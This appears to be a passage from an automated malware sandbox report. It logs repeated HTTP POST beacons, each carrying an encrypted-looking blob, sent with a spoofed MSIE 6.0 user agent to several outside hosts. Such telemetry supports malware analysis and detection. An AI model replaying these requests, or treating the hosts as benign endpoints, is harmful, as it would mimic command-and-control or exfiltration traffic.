43 74 67 4b 54 70 45 69 31 6c 56 32 78 2b 2b 6a 33 62 42 4c 31 72 36 54 49 68 6c 5a 77 35 77 78 50 41 45 61 6a 72 72 32 52 34 79 79 4c 46 51 4d 34 6d 61 41 64 43 6e 4c 4a 74 51 44 4e 45 42 72 41 6a 39 70 78 62 6b 74 67 50 70 4d 6c 79 46 39 44 6c 31 6c 4c 47 6d 4f 2f 53 4e 65 44 77 49 4d 51 30 6a 56 31 5a 44 67 67 4d 73 56 53 4c 33 33 50 30 70 42 76 4c 77 4a 73 56 71 33 73 42 41 77 31 42 49 44 45 6f 31 2b 73 4a 59 6c 44 77 78 64 7a 71 4e 54 49 59 6f 72 58 38 45 68 77 38 49 79 66 42 77 58 72 58 79 52 6c 4d 58 73 62 46 69 79 6c 74 49 57 37 42 75 42 78 57 79 70 64 72 42 56 37 51 62 6c 6b 64 43 6b 2f 55 36 73 32 49 6b 74 52 5a 72 53 37 2f 46 6f 65 43 61 4c 70 48 53 78 43 72 67 58 31 6a 49 69 6e 74 2b 42 67 39 39 41 7a 37 4b 56 74 54 72 75 69 45 30 72 59 70 6e 70 4b 31 48 42 2f 4c 4f 2f 54 2b 71 48 6d 76 70 54 78 57 50 2f 4a 7a 4f 53 2f 57 53 42 4b 47 45 47 79 5a 74 72 54 4b 4c 4d 59 6b 62 64 42 51 56 78 71 32 46 52 33 65 44 72 72 51 57 7a 43 35 52 4c 78 4d 45 56 34 50 54 74 35 46 4b 31 70 31 78 47 2f 67 61 68 67 6d 71 6b 59 72 63 72 35 50 75 76 53 49 55 77 50 2f 6b 73 68 6f 66 4b 53 30 4d 53 43 74 65 56 6c 4b 4a 56 51 7a 53 35 70 42 34 4b 5a 36 63 4d 31 41 6a 36 58 69 71 6b 66 4f 6a 6a 76 69 51 32 67 42 6a 63 42 78 4e 7a 63 54 69 37 34 42 66 6f 67 56 73 50 6e 2b 62 51 3d 3d Data Ascii: je8dOtF0kNEY3eOUcCe51yphYN6PdgqelbD9RuGyUHaqfP0VBIm6UWpfSemSe7YJaEcw4aF01JNfhpQ44k0OKOq0+o951wmphM39nePbV2hyq37c7BBhge6FDPTqnjbm8PYlnbMqXuAbgA4mNBK3G5KnVVsvBICt+bXTgUF1GQCtgKTpEi1lV2x++j3bBL1r6TIhlZw5wxPAEajrr2R4yyLFQM4maAdCnLJtQDNEBrAj9pxbktgPpMlyF9Dl1lLGmO/SNeDwIMQ0jV1ZDggMsVSL33P0pBvLwJsVq3sBAw1BIDEo1+sJYlDwxdzqNTIYorX8Ehw8IyfBwXrXyRlMXsbFiyltIW7BuBxWypdrBV7QblkdCk/U6s2IktRZrS7/FoeCaLpHSxCrgX1jIint+Bg99Az7KVtTruiE0rYpnpK1HB/LO/T+qHmvpTxWP/JzOS/WSBKGEGyZtrTKLMYkbdBQVxq2FR3eDrrQWzC5RLxMEV4PTt5FK1p1xG/gahgmqkYrcr5PuvSIUwP/kshofKS0MSCteVlKJVQzS5pB4KZ6cM1Aj6XiqkfOjjviQ2gBjcBxNzcTi74BfogVsPn+bQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 72 72 58 63 42 45 4e 4c 75 4e 48 72 70 44 79 6d 53 6e 64 53 71 6d 7a 75 72 58 44 70 43 68 78 59 4a 38 33 77 72 63 4a 71 75 41 43 54 63 69 32 35 4a 73 42 65 6d 63 61 67 79 79 6c 76 7a 66 4d 34 67 43 45 32 32 55 43 67 43 6c 50 43 4b 30 55 34 4f 45 6a 79 7a 57 38 59 53 66 56 6b 63 37 36 33 63 53 51 41 76 78 35 44 4b 56 61 34 47 75 73 70 43 52 39 2b 4c 39 6f 62 33 76 65 45 47 43 58 2f 56 48 31 7a 72 77 30 4d 6e 55 73 30 36 78 6d 63 4c 75 45 44 51 73 34 45 6a 64 6a 54 7a 34 6a 47 71 2f 54 53 67 52 65 5a 63 4c 58 64 48 50 6b 77 33 73 36 72 78 55 72 66 35 79 5a 58 34 7a 31 32 73 77 56 50 62 31 50 52 42 6d 52 69 75 30 37 67 4a 31 58 31 41 42 35 36 76 39 4a 2b 75 77 4a 47 6d 57 55 31 76 47 49 48 32 61 50 4b 37 78 74 6d 54 79 64 73 36 46 5a 4e 73 7a 67 76 38 50 52 65 5a 62 6a 50 46 4d 31 56 75 44 54 56 57 7a 63 4c 42 50 74 43 38 39 41 65 50 31 33 78 62 67 45 33 72 6e 59 4e 55 45 64 43 35 72 70 39 36 76 79 37 76 7a 75 70 35 62 30 63 58 4e 75 4f 75 4f 30 64 67 6d 31 61 47 6f 62 6d 74 54 4f 44 2f 37 38 53 71 35 4d 37 2f 47 63 2f 44 79 62 74 6a 69 41 48 51 66 79 7a 6f 4e 6f 54 56 6a 79 4d 6f 50 79 49 36 78 73 33 76 67 50 2f 79 37 6f 70 76 30 35 6a 37 39 78 71 4f 56 2f 4e 39 33 46 63 71 62 35 2f 34 31 43 6f 2f 65 52 36 77 73 37 71 44 53 71 59 55 31 69 45 56 32 53 53 33 50 4f 52 4d 7a 4b 45 73 61 57 38 51 47 72 4d 43 6f 49 53 43 32 5a 6c 49 36 37 58 70 59 38 55 32 65 66 4e 6f 2b 69 6d 37 63 67 2b 2f 43 32 74 61 2b 57 69 52 6f 65 64 30 55 44 47 71 43 43 69 67 46 72 31 52 51 6e 50 58 52 34 78 45 5a 70 31 76 33 36 34 6b 46 74 47 44 47 52 2b 4a 75 54 67 62 34 50 51 65 30 34 38 72 71 30 50 4f 59 4f 4c 58 45 42 54 48 6e 4e 6a 6e 68 2b 4f 76 38 36 32 Data Ascii: rrXcBENLuNHrpDymSndSqmzurXDpChxYJ83wrcJquACTci25JsBemcagyylvzfM4gCE22UCgClPCK0U4OEjyzW8YSfVkc763cSQAvx5DKVa4GuspCR9+L9ob3veEGCX/VH1zrw0MnUs06xmcLuEDQs4EjdjTz4jGq/TSgReZcLXdHPkw3s6rxUrf5yZX4z12swVPb1PRBmRiu07gJ1X1AB56v9J+uwJGmWU1vGIH2aPK7xtmTyds6FZNszgv8PReZbjPFM1VuDTVWzcLBPtC89AeP13xbgE3rnYNUEdC5rp96vy7vzup5b0cXNuOuO0dgm1aGobmtTOD/78Sq5M7/Gc/DybtjiAHQfyzoNoTVjyMoPyI6xs3vgP/y7opv05j79xqOV/N93Fcqb5/41Co/eR6ws7qDSqYU1iEV2SS3PORMzKEsaW8QGrMCoISC2ZlI67XpY8U2efNo+im7cg+/C2ta+WiRoed0UDGqCCigFr1RQnPXR4xEZp1v364kFtGDGR+JuTgb4PQe048rq0POYOLXEBTHnNjnh+Ov862
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 57 63 31 62 51 49 55 72 51 5a 6e 37 62 77 35 58 72 43 63 53 50 50 36 74 45 56 64 54 46 56 76 6b 69 56 67 45 68 68 4f 55 75 65 55 66 39 30 42 58 41 31 38 6a 30 56 49 42 74 79 41 37 43 4d 51 31 34 67 39 65 42 61 6e 45 56 64 65 7a 30 77 61 6a 39 4b 4e 76 4b 61 4c 6f 47 4b 53 4b 73 6e 63 76 49 5a 63 61 55 68 44 6a 68 78 59 50 4f 50 31 7a 79 50 75 74 6b 41 7a 37 38 79 57 41 7a 32 2f 67 61 76 64 2f 53 48 6a 4d 54 78 67 34 62 69 66 45 4f 44 6c 30 45 77 43 79 30 6e 2f 6c 68 36 39 66 4e 6e 33 76 47 62 67 76 38 68 48 51 39 79 46 36 45 76 67 45 30 4a 52 2b 78 54 68 77 32 45 52 73 47 55 4d 49 52 7a 38 79 36 48 6f 55 38 51 33 7a 4e 4b 36 6f 72 79 32 33 4b 58 70 63 69 6a 57 55 34 33 61 6d 4f 64 4c 79 59 73 52 4f 6f 34 43 71 49 41 7a 6c 52 72 41 6d 51 62 37 6e 62 6c 45 52 77 4f 70 4a 37 2f 65 48 6b 54 45 50 34 5a 61 59 58 51 4a 38 44 74 79 43 33 71 72 32 2f 41 50 42 33 64 71 4f 69 42 76 78 41 34 41 51 6a 7a 33 6c 6b 6d 54 76 35 46 7a 68 33 39 64 43 33 57 37 33 41 43 55 6e 65 34 67 50 52 68 6f 41 69 6c 4a 48 41 67 33 58 52 32 69 50 4c 47 6b 48 4b 68 33 4e 64 55 69 5a 66 42 58 4b 65 50 65 69 63 49 76 71 38 51 42 37 67 34 6c 42 50 4d 4e 63 39 33 2f 7a 77 31 64 46 30 4d 61 68 45 45 52 31 4d 30 4a 42 54 62 4f 76 72 66 75 58 48 2f 34 31 66 35 69 41 36 42 45 66 76 33 58 35 32 6a 61 39 69 6a 55 31 69 49 72 62 45 37 7a 32 4e 73 54 33 35 7a 54 70 76 63 74 72 6c 37 72 65 55 69 58 6f 30 4f 77 66 6f 74 47 58 45 46 76 69 55 36 35 47 54 41 42 57 48 4d 41 57 75 43 68 2b 6e 67 6e 70 70 61 46 51 32 70 71 30 51 71 47 38 2f 6f 6a 68 62 4d 75 53 72 31 35 30 66 49 4a 33 6b 65 6f 58 43 79 5a 69 42 4f 4c 6f 37 57 74 66 46 33 50 65 31 37 65 47 Data Ascii: Wc1bQIUrQZn7bw5XrCcSPP6tEVdTFVvkiVgEhhOUueUf90BXA18j0VIBtyA7CMQ14g9eBanEVdez0waj9KNvKaLoGKSKsncvIZcaUhDjhxYPOP1zyPutkAz78yWAz2/gavd/SHjMTxg4bifEODl0EwCy0n/lh69fNn3vGbgv8hHQ9yF6EvgE0JR+xThw2ERsGUMIRz8y6HoU8Q3zNK6ory23KXpcijWU43amOdLyYsROo4CqIAzlRrAmQb7nblERwOpJ7/eHkTEP4ZaYXQJ8DtyC3qr2/APB3dqOiBvxA4AQjz3lkmTv5Fzh39dC3W73ACUne4gPRhoAilJHAg3XR2iPLGkHKh3NdUiZfBXKePeicIvq8QB7g4lBPMNc93/zw1dF0MahEER1M0JBTbOvrfuXH/41f5iA6BEfv3X52ja9ijU1iIrbE7z2NsT35zTpvctrl7reUiXo0OwfotGXEFviU65GTABWHMAWuCh+ngnppaFQ2pq0QqG8/ojhbMuSr150fIJ3keoXCyZiBOLo7WtfF3Pe17eG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 69 52 46 44 63 52 58 43 51 70 6d 42 31 74 4a 7a 2f 43 77 30 6b 67 37 58 75 63 6b 6a 31 7a 6c 55 47 5a 44 58 4c 30 69 37 65 6f 33 2b 68 72 69 2f 39 4f 79 48 4d 54 34 4c 2f 4a 30 4d 7a 79 42 36 72 7a 56 2f 2b 2f 56 68 57 37 64 66 38 57 64 70 33 33 5a 33 41 57 7a 68 62 43 50 38 46 79 37 35 6d 61 6f 4e 58 45 67 56 4a 33 38 56 30 6e 75 53 6b 69 5a 2b 65 59 6e 2b 59 67 30 6e 2b 50 68 77 47 7a 5a 52 47 7a 57 64 61 41 39 54 67 37 55 35 77 4a 50 2f 39 45 70 51 4f 5a 78 31 43 57 78 70 4c 64 63 32 6a 77 2f 53 2f 52 77 44 74 4b 48 4a 55 59 76 4b 74 63 48 78 6e 4b 7a 49 56 75 6a 78 57 51 4c 56 44 47 48 4f 36 62 34 58 42 53 63 72 5a 34 73 54 71 74 65 36 31 6d 73 33 33 43 30 33 52 2f 2b 4d 44 78 71 37 65 72 4f 67 33 66 4e 74 7a 77 45 2b 77 77 76 72 77 59 39 58 6a 70 5a 32 2f 70 6c 59 62 45 61 53 52 50 6c 7a 68 2f 34 4c 30 57 4a 6d 47 4c 4a 37 34 33 2f 35 63 74 63 42 59 54 5a 4a 57 30 57 4d 73 71 4c 4c 46 37 41 49 4c 50 58 33 70 38 64 47 4d 77 38 69 37 6c 6e 31 5a 39 73 66 4e 34 42 69 4d 4d 4e 43 43 5a 33 46 35 33 4a 78 77 73 63 67 6d 56 4d 6a 30 32 4d 62 53 36 67 4c 4b 6a 68 34 7a 61 34 6d 76 6d 63 4c 65 6d 54 6f 67 59 31 62 47 46 72 4d 68 58 6d 37 6c 77 74 37 65 63 49 55 41 2b 46 79 46 4f 52 31 76 58 68 43 63 67 6b 4f 67 49 71 4f 66 4d 6e 6e 59 4d 62 6d 32 2b 34 34 4d 42 47 2b 59 38 66 38 37 6a 59 6c 4b 34 5a 37 73 37 6e 4e 68 35 6a 43 52 4f 51 72 37 55 55 2f 42 52 44 68 37 71 67 61 65 74 69 6b 53 32 70 61 2f 72 46 39 46 39 36 76 6e 69 47 33 6a 4c 48 52 33 37 49 30 57 72 72 72 41 34 6a 52 4c 2f 41 31 6b 31 45 7a 7a 6e 39 6d 63 4d 76 4b 31 34 75 77 4f 30 4c 4c 33 70 4d 36 51 6a 65 69 46 6d 56 54 64 7a 71 78 43 66 31 56 55 52 48 35 67 66 6f 5a 42 4f 47 62 Data Ascii: iRFDcRXCQpmB1tJz/Cw0kg7Xuckj1zlUGZDXL0i7eo3+hri/9OyHMT4L/J0MzyB6rzV/+/VhW7df8Wdp33Z3AWzhbCP8Fy75maoNXEgVJ38V0nuSkiZ+eYn+Yg0n+PhwGzZRGzWdaA9Tg7U5wJP/9EpQOZx1CWxpLdc2jw/S/RwDtKHJUYvKtcHxnKzIVujxWQLVDGHO6b4XBScrZ4sTqte61ms33C03R/+MDxq7erOg3fNtzwE+wwvrwY9XjpZ2/plYbEaSRPlzh/4L0WJmGLJ743/5ctcBYTZJW0WMsqLLF7AILPX3p8dGMw8i7ln1Z9sfN4BiMMNCCZ3F53JxwscgmVMj02MbS6gLKjh4za4mvmcLemTogY1bGFrMhXm7lwt7ecIUA+FyFOR1vXhCcgkOgIqOfMnnYMbm2+44MBG+Y8f87jYlK4Z7s7nNh5jCROQr7UU/BRDh7qgaetikS2pa/rF9F96vniG3jLHR37I0WrrrA4jRL/A1k1Ezzn9mcMvK14uwO0LL3pM6QjeiFmVTdzqxCf1VURH5gfoZBOGb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 72 72 58 63 42 45 4e 4c 75 4e 48 72 70 44 79 6d 53 6e 64 53 71 6d 7a 75 72 58 44 70 43 68 78 59 4a 38 33 77 72 63 4a 71 75 41 43 54 63 69 32 35 4a 73 42 65 6d 63 61 67 79 79 6c 76 7a 66 4d 34 67 43 45 32 32 55 43 67 43 6c 50 43 4b 30 55 34 4f 45 6a 79 7a 57 38 59 53 66 56 6b 63 37 36 33 63 53 51 41 76 78 35 44 4b 56 61 34 47 75 73 70 43 52 39 2b 4c 39 6f 62 33 76 65 45 47 43 58 2f 56 48 31 7a 72 77 30 4d 6e 55 73 30 36 78 6d 63 4c 75 45 44 51 73 34 45 6a 64 6a 54 7a 34 6a 47 71 2f 54 53 67 52 65 5a 63 4c 58 64 48 50 6b 77 33 73 36 72 78 55 72 66 35 79 5a 58 34 7a 31 32 73 77 56 50 62 31 50 52 42 6d 52 69 75 30 37 67 4a 31 58 31 41 42 35 36 76 39 4a 2b 75 77 4a 47 6d 57 55 31 76 47 49 48 32 61 50 4b 37 78 74 6d 54 79 64 73 36 46 5a 4e 73 7a 67 76 38 50 52 65 5a 62 6a 50 46 4d 31 56 75 44 54 56 57 7a 63 4c 42 50 74 43 38 39 41 65 50 31 33 78 62 67 45 33 72 6e 59 4e 55 45 64 43 35 72 70 39 36 76 79 37 76 7a 75 70 35 62 30 63 58 4e 75 4f 75 4f 30 64 67 6d 31 61 47 6f 62 6d 74 54 4f 44 2f 37 38 53 71 35 4d 37 2f 47 63 2f 44 79 62 74 6a 69 41 48 51 66 79 7a 6f 4e 6f 54 56 6a 79 4d 6f 50 79 49 36 78 73 33 76 67 50 2f 79 37 6f 70 76 30 35 6a 37 39 78 71 4f 56 2f 4e 39 33 46 63 71 62 35 2f 34 31 43 6f 2f 65 52 36 77 73 37 71 44 53 71 59 55 31 69 45 56 32 53 53 33 50 4f 52 4d 7a 4b 45 73 61 57 38 51 47 72 4d 43 6f 49 53 43 32 5a 6c 49 36 37 58 70 59 38 55 32 65 66 4e 6f 2b 69 6d 37 63 67 2b 2f 43 32 74 61 2b 57 69 52 6f 65 64 30 55 44 47 71 43 43 69 67 46 72 31 52 51 6e 50 58 52 34 78 45 5a 70 31 76 33 36 34 6b 46 74 47 44 47 52 2b 4a 75 54 67 62 34 50 51 65 30 34 38 72 71 30 50 4f 59 4f 4c 58 45 42 54 48 6e 4e 6a 6e 68 2b 4f 76 38 36 32 Data Ascii: rrXcBENLuNHrpDymSndSqmzurXDpChxYJ83wrcJquACTci25JsBemcagyylvzfM4gCE22UCgClPCK0U4OEjyzW8YSfVkc763cSQAvx5DKVa4GuspCR9+L9ob3veEGCX/VH1zrw0MnUs06xmcLuEDQs4EjdjTz4jGq/TSgReZcLXdHPkw3s6rxUrf5yZX4z12swVPb1PRBmRiu07gJ1X1AB56v9J+uwJGmWU1vGIH2aPK7xtmTyds6FZNszgv8PReZbjPFM1VuDTVWzcLBPtC89AeP13xbgE3rnYNUEdC5rp96vy7vzup5b0cXNuOuO0dgm1aGobmtTOD/78Sq5M7/Gc/DybtjiAHQfyzoNoTVjyMoPyI6xs3vgP/y7opv05j79xqOV/N93Fcqb5/41Co/eR6ws7qDSqYU1iEV2SS3PORMzKEsaW8QGrMCoISC2ZlI67XpY8U2efNo+im7cg+/C2ta+WiRoed0UDGqCCigFr1RQnPXR4xEZp1v364kFtGDGR+JuTgb4PQe048rq0POYOLXEBTHnNjnh+Ov862
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 41 65 6f 2f 65 58 77 45 51 35 6d 47 4a 44 37 43 4a 35 57 37 4b 41 2b 74 53 71 6b 55 41 31 65 76 63 47 57 57 62 65 73 78 30 66 6d 71 6b 48 43 38 51 33 72 55 4e 50 73 77 6b 6e 4a 56 51 64 57 32 78 6b 49 4b 51 33 58 36 30 4f 6a 76 61 65 30 37 64 7a 66 5a 44 4a 74 4c 69 69 35 72 52 68 62 66 67 56 62 6a 59 33 33 74 7a 46 67 69 67 34 70 38 6c 76 65 37 2b 36 78 75 69 48 6f 38 6b 35 71 76 53 59 53 57 48 4c 39 36 72 69 49 52 57 64 71 31 64 54 64 69 4b 69 54 58 5a 76 72 39 67 4f 32 6d 6e 44 52 67 4d 61 47 63 5a 63 47 71 49 38 47 35 32 67 63 48 33 48 76 35 70 59 61 64 31 32 33 4d 54 74 46 37 43 53 6d 4c 65 4f 30 69 5a 55 66 57 52 76 47 50 6e 65 6f 62 73 63 41 66 65 39 50 32 67 72 48 59 2b 43 75 68 5a 49 62 58 6d 68 6f 59 6e 46 53 31 4a 4a 31 49 6c 35 44 42 31 38 69 77 74 6b 66 2f 4d 62 50 6f 2f 33 4b 66 79 6f 2b 4c 76 42 4d 4d 50 35 43 71 2b 4c 57 43 68 71 46 69 64 41 6f 70 2f 46 74 69 67 32 6c 52 66 46 37 67 4d 67 43 71 67 51 34 77 76 74 49 46 59 70 69 54 46 76 36 55 34 2f 31 32 68 72 59 76 52 64 68 69 50 6c 64 56 73 6e 47 75 35 62 4a 55 37 62 4e 34 48 55 76 44 35 47 67 4e 2b 61 36 6e 6c 5a 4b 70 74 79 61 2b 69 78 71 4f 55 52 4d 34 39 2f 42 35 63 4d 54 76 33 51 46 54 57 67 50 36 63 4f 2b 62 6e 49 68 6f 7a 58 32 50 53 2b 66 56 62 42 46 76 64 44 30 4b 4b 65 51 46 2b 31 67 62 77 37 74 49 63 42 4e 49 6b 6e 48 30 39 4d 71 62 38 7a 59 37 77 38 66 41 53 75 32 2f 37 2b 69 43 2b 77 6d 4d 4d 70 4e 6a 65 71 46 68 37 64 39 71 4d 42 61 2b 49 33 4d 67 44 71 53 41 6b 78 5a 72 54 31 70 63 50 6c 50 76 4e 78 54 63 76 30 33 74 79 4e 2b 49 6c 6e 66 58 4b 2f 4c 37 31 61 5a 65 76 4e 67 58 38 71 59 4c 6b 4d 55 31 39 64 4b 72 6a 48 57 43 6c 4b 4b 57 6f 6a 77 66 66 54 34 56 72 32 70 65 59 4e 77 73 51 56 67 35 55 73 6e 78 47 33 57 6f 56 6a 6d 61 78 68 4e 78 49 74 31 35 6d 6c 5a 4b 52 6c 66 32 50 77 41 56 Data Ascii: Aeo/eXwEQ5mGJD7CJ5W7KA+tSqkUA1evcGWWbesx0fmqkHC8Q3rUNPswknJVQdW2xkIKQ3X60Ojvae07dzfZDJtLii5rRhbfgVbjY33tzFgig4p8lve7+6xuiHo8k5qvSYSWHL96riIRWdq1dTdiKiTXZvr9gO2mnDRgMaGcZcGqI8G52gcH3Hv5pYad123MTtF7CSmLeO0iZUfWRvGPneobscAfe9P2grHY+CuhZIbXmhoYnFS1JJ1Il5DB18iwtkf/MbPo/3Kfyo+LvBMMP5Cq+LWChqFidAop/Ftig2lRfF7gMgCqgQ4wvtIFYpiTFv6U4/12hrYvRdhiPldVsnGu5bJU7bN4HUvD5GgN+a6nlZKptya+ixqOURM49/B5cMTv3QFTWgP6cO+bnIhozX2PS+fVbBFvdD0KKeQF+1gbw7tIcBNIknH09Mqb8zY7w8fASu2/7+iC+wmMMpNjeqFh7d9qMBa+I3MgDqSAkxZrT1pcPlPvNxTcv03tyN+IlnfXK/L71aZevNgX8qYLkMU19dKrjHWClKKWojwffT4Vr2peYNwsQVg5UsnxG3WoVjmaxhNxIt15mlZKRlf2PwAV
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 57 63 31 62 51 49 55 72 51 5a 6e 37 62 77 35 58 72 43 63 53 50 50 36 74 45 56 64 54 46 56 76 6b 69 56 67 45 68 68 4f 55 75 65 55 66 39 30 42 58 41 31 38 6a 30 56 49 42 74 79 41 37 43 4d 51 31 34 67 39 65 42 61 6e 45 56 64 65 7a 30 77 61 6a 39 4b 4e 76 4b 61 4c 6f 47 4b 53 4b 73 6e 63 76 49 5a 63 61 55 68 44 6a 68 78 59 50 4f 50 31 7a 79 50 75 74 6b 41 7a 37 38 79 57 41 7a 32 2f 67 61 76 64 2f 53 48 6a 4d 54 78 67 34 62 69 66 45 4f 44 6c 30 45 77 43 79 30 6e 2f 6c 68 36 39 66 4e 6e 33 76 47 62 67 76 38 68 48 51 39 79 46 36 45 76 67 45 30 4a 52 2b 78 54 68 77 32 45 52 73 47 55 4d 49 52 7a 38 79 36 48 6f 55 38 51 33 7a 4e 4b 36 6f 72 79 32 33 4b 58 70 63 69 6a 57 55 34 33 61 6d 4f 64 4c 79 59 73 52 4f 6f 34 43 71 49 41 7a 6c 52 72 41 6d 51 62 37 6e 62 6c 45 52 77 4f 70 4a 37 2f 65 48 6b 54 45 50 34 5a 61 59 58 51 4a 38 44 74 79 43 33 71 72 32 2f 41 50 42 33 64 71 4f 69 42 76 78 41 34 41 51 6a 7a 33 6c 6b 6d 54 76 35 46 7a 68 33 39 64 43 33 57 37 33 41 43 55 6e 65 34 67 50 52 68 6f 41 69 6c 4a 48 41 67 33 58 52 32 69 50 4c 47 6b 48 4b 68 33 4e 64 55 69 5a 66 42 58 4b 65 50 65 69 63 49 76 71 38 51 42 37 67 34 6c 42 50 4d 4e 63 39 33 2f 7a 77 31 64 46 30 4d 61 68 45 45 52 31 4d 30 4a 42 54 62 4f 76 72 66 75 58 48 2f 34 31 66 35 69 41 36 42 45 66 76 33 58 35 32 6a 61 39 69 6a 55 31 69 49 72 62 45 37 7a 32 4e 73 54 33 35 7a 54 70 76 63 74 72 6c 37 72 65 55 69 58 6f 30 4f 77 66 6f 74 47 58 45 46 76 69 55 36 35 47 54 41 42 57 48 4d 41 57 75 43 68 2b 6e 67 6e 70 70 61 46 51 32 70 71 30 51 71 47 38 2f 6f 6a 68 62 4d 75 53 72 31 35 30 66 49 4a 33 6b 65 6f 58 43 79 5a 69 42 4f 4c 6f 37 57 74 66 46 33 50 65 31 37 65 47 Data Ascii: Wc1bQIUrQZn7bw5XrCcSPP6tEVdTFVvkiVgEhhOUueUf90BXA18j0VIBtyA7CMQ14g9eBanEVdez0waj9KNvKaLoGKSKsncvIZcaUhDjhxYPOP1zyPutkAz78yWAz2/gavd/SHjMTxg4bifEODl0EwCy0n/lh69fNn3vGbgv8hHQ9yF6EvgE0JR+xThw2ERsGUMIRz8y6HoU8Q3zNK6ory23KXpcijWU43amOdLyYsROo4CqIAzlRrAmQb7nblERwOpJ7/eHkTEP4ZaYXQJ8DtyC3qr2/APB3dqOiBvxA4AQjz3lkmTv5Fzh39dC3W73ACUne4gPRhoAilJHAg3XR2iPLGkHKh3NdUiZfBXKePeicIvq8QB7g4lBPMNc93/zw1dF0MahEER1M0JBTbOvrfuXH/41f5iA6BEfv3X52ja9ijU1iIrbE7z2NsT35zTpvctrl7reUiXo0OwfotGXEFviU65GTABWHMAWuCh+ngnppaFQ2pq0QqG8/ojhbMuSr150fIJ3keoXCyZiBOLo7WtfF3Pe17eG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 72 72 58 63 42 45 4e 4c 75 4e 48 72 70 44 79 6d 53 6e 64 53 71 6d 7a 75 72 58 44 70 43 68 78 59 4a 38 33 77 72 63 4a 71 75 41 43 54 63 69 32 35 4a 73 42 65 6d 63 61 67 79 79 6c 76 7a 66 4d 34 67 43 45 32 32 55 43 67 43 6c 50 43 4b 30 55 34 4f 45 6a 79 7a 57 38 59 53 66 56 6b 63 37 36 33 63 53 51 41 76 78 35 44 4b 56 61 34 47 75 73 70 43 52 39 2b 4c 39 6f 62 33 76 65 45 47 43 58 2f 56 48 31 7a 72 77 30 4d 6e 55 73 30 36 78 6d 63 4c 75 45 44 51 73 34 45 6a 64 6a 54 7a 34 6a 47 71 2f 54 53 67 52 65 5a 63 4c 58 64 48 50 6b 77 33 73 36 72 78 55 72 66 35 79 5a 58 34 7a 31 32 73 77 56 50 62 31 50 52 42 6d 52 69 75 30 37 67 4a 31 58 31 41 42 35 36 76 39 4a 2b 75 77 4a 47 6d 57 55 31 76 47 49 48 32 61 50 4b 37 78 74 6d 54 79 64 73 36 46 5a 4e 73 7a 67 76 38 50 52 65 5a 62 6a 50 46 4d 31 56 75 44 54 56 57 7a 63 4c 42 50 74 43 38 39 41 65 50 31 33 78 62 67 45 33 72 6e 59 4e 55 45 64 43 35 72 70 39 36 76 79 37 76 7a 75 70 35 62 30 63 58 4e 75 4f 75 4f 30 64 67 6d 31 61 47 6f 62 6d 74 54 4f 44 2f 37 38 53 71 35 4d 37 2f 47 63 2f 44 79 62 74 6a 69 41 48 51 66 79 7a 6f 4e 6f 54 56 6a 79 4d 6f 50 79 49 36 78 73 33 76 67 50 2f 79 37 6f 70 76 30 35 6a 37 39 78 71 4f 56 2f 4e 39 33 46 63 71 62 35 2f 34 31 43 6f 2f 65 52 36 77 73 37 71 44 53 71 59 55 31 69 45 56 32 53 53 33 50 4f 52 4d 7a 4b 45 73 61 57 38 51 47 72 4d 43 6f 49 53 43 32 5a 6c 49 36 37 58 70 59 38 55 32 65 66 4e 6f 2b 69 6d 37 63 67 2b 2f 43 32 74 61 2b 57 69 52 6f 65 64 30 55 44 47 71 43 43 69 67 46 72 31 52 51 6e 50 58 52 34 78 45 5a 70 31 76 33 36 34 6b 46 74 47 44 47 52 2b 4a 75 54 67 62 34 50 51 65 30 34 38 72 71 30 50 4f 59 4f 4c 58 45 42 54 48 6e 4e 6a 6e 68 2b 4f 76 38 36 32 Data Ascii: rrXcBENLuNHrpDymSndSqmzurXDpChxYJ83wrcJquACTci25JsBemcagyylvzfM4gCE22UCgClPCK0U4OEjyzW8YSfVkc763cSQAvx5DKVa4GuspCR9+L9ob3veEGCX/VH1zrw0MnUs06xmcLuEDQs4EjdjTz4jGq/TSgReZcLXdHPkw3s6rxUrf5yZX4z12swVPb1PRBmRiu07gJ1X1AB56v9J+uwJGmWU1vGIH2aPK7xtmTyds6FZNszgv8PReZbjPFM1VuDTVWzcLBPtC89AeP13xbgE3rnYNUEdC5rp96vy7vzup5b0cXNuOuO0dgm1aGobmtTOD/78Sq5M7/Gc/DybtjiAHQfyzoNoTVjyMoPyI6xs3vgP/y7opv05j79xqOV/N93Fcqb5/41Co/eR6ws7qDSqYU1iEV2SS3PORMzKEsaW8QGrMCoISC2ZlI67XpY8U2efNo+im7cg+/C2ta+WiRoed0UDGqCCigFr1RQnPXR4xEZp1v364kFtGDGR+JuTgb4PQe048rq0POYOLXEBTHnNjnh+Ov862
